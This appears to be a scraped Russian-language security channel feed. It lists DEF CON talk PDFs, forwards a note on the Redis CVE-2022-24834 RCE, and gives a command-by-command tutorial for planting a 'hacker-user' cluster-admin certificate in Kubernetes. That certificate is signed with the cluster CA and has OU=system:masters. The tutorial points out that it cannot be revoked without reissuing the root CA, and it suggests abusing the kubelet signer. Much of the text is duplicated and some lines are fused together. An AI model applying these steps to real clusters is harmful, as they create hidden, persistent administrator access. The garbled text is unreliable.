DEF_CON_32_Vangelis_Stykas_Behind_Enemy_Lines_Engaging_and_disrupting.pdf
3.8 MB
Искусство компрометации (вебчик)
DEF_CON_32_Vladyslav_Zubkov_Martin_Strohmeier_Exploiting_Bluetooth.pdf
11.9 MB
Exploiting Bluetooth: from your car to the bank account
Forwarded from Proxy Bar
CVE-2022-24834 Redis
*
Затронуто:
7.0.0 ≤ version < 7.0.12
6.2.0 ≤ version < 6.2.13
2.6.0 ≤ version < 6.0.20
*
Большой разбор + PoC exploit RCE
*
VideoPOC
#redis #rce
*
Затронуто:
7.0.0 ≤ version < 7.0.12
6.2.0 ≤ version < 6.2.13
2.6.0 ≤ version < 6.0.20
*
Большой разбор + PoC exploit RCE
*
VideoPOC
#redis #rce
Знаете как создать супер пользака в k8s используя csr Manual/Api?
Anonymous Poll
20%
1. Да
80%
2. Нет
Так-с, начнём с базы.
У нас есть rsa приватный ключик, и запрос на подписание csr (в csr в поле CN мы пишем имя пользователя).
Далее у нас 2 выбора, подписать с использованием openssl или же с помощью api кубера;
Как это сделать руками:
1)
2)
3)
4) Собираем наш профиль, не csr не нужно будет апрувить, мы их руками подписали:
Вариант с api:
Шаги 1 и 2 повторяются из предыдущего шага;
3) Дальше нам необходимо создать запрос на подпись:
5) Далее в объекте csr у нас появится сертификат который можно использовать для взаимодействия с кубером (сборка конфиг файла kubeconfig как в предыдущем способе);
У нас есть rsa приватный ключик, и запрос на подписание csr (в csr в поле CN мы пишем имя пользователя).
Далее у нас 2 выбора, подписать с использованием openssl или же с помощью api кубера;
Как это сделать руками:
1)
openssl genrsa -out /root/60099.key 2048
2)
openssl req -new -key /root/60099.key -out /root/60099.csr
MUST SET username IN CN: [email protected] !!!!
3)
openssl x509 -req -in /root/60099.csr -CA /etc/kubernetes/pki/ca.crt -CAkey /etc/kubernetes/pki/ca.key -CAcreateserial -out /root/60099.crt -days 500
4) Собираем наш профиль, не csr не нужно будет апрувить, мы их руками подписали:
k config set-credentials [email protected] --client-key=60099.key --client-certificate=60099.crt
k config set-context [email protected] --cluster=kubernetes [email protected]
k config get-contexts
k config use-context [email protected]
Вариант с api:
Шаги 1 и 2 повторяются из предыдущего шага;
3) Дальше нам необходимо создать запрос на подпись:
apiVersion: certificates.k8s.io/v14) Теперь надо его подписать (kubectl certificate approve {{CN_from_csr}});
kind: CertificateSigningRequest
metadata:
name: {{CN_from_csr}} # ADD
spec:
groups:
- system:authenticated
request: {{BASE_64_ENCODED_CSR}} # ADD
signerName: kubernetes.io/kube-apiserver-client
usages:
- client auth
5) Далее в объекте csr у нас появится сертификат который можно использовать для взаимодействия с кубером (сборка конфиг файла kubeconfig как в предыдущем способе);
Теперь про сладенькое.
Крч "группы" пользака можно подтянуть через OU расширения в сертификаты:
or:
И всё, не отзываем, чтобы грохнуть надо будет перевыпускать корневой сертификат.
😂 Пока писал подумал, а почему мы выписываем сертификат именно у
Да , он автоматом не подписывает csr, однако у нас есть;
Он может таки и авто апрувнуть сертификатик, но надо будет представиться узлом. Если кто хочет протыкать или если кто-то так делал пожалуйста отпишитесь ;)
Крч "группы" пользака можно подтянуть через OU расширения в сертификаты:
openssl req -new -newkey rsa:2048 -nodes -keyout /root/60099.key -out /root/60099.csr -subj "/CN=hacker-user/OU=system:masters/OU=system:authenticated"
or:
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
name: {{CN_from_csr}} # ADD
spec:
groups:
- system:masters # this
- system:authenticated
request: {{BASE_64_ENCODED_CSR}} # ADD
signerName: kubernetes.io/kube-apiserver-client
usages:
- client auth
И всё, не отзываем, чтобы грохнуть надо будет перевыпускать корневой сертификат.
😂 Пока писал подумал, а почему мы выписываем сертификат именно у
kubernetes.io/kube-apiserver-client
Да , он автоматом не подписывает csr, однако у нас есть;
kubernetes.io/kube-apiserver-client-kubelet
Он может таки и авто апрувнуть сертификатик, но надо будет представиться узлом. Если кто хочет протыкать или если кто-то так делал пожалуйста отпишитесь ;)
👍1